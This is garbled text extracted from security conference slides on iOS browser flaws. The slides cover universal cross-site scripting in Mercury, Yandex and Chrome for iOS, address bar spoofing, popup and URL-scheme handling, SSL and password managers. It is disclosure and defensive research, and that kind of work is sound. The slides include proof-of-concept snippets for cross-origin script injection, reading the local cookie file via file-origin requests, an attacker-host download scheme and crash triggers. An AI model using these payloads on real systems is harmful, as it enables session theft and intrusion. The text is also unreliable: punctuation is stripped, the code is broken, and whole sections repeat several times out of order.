bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
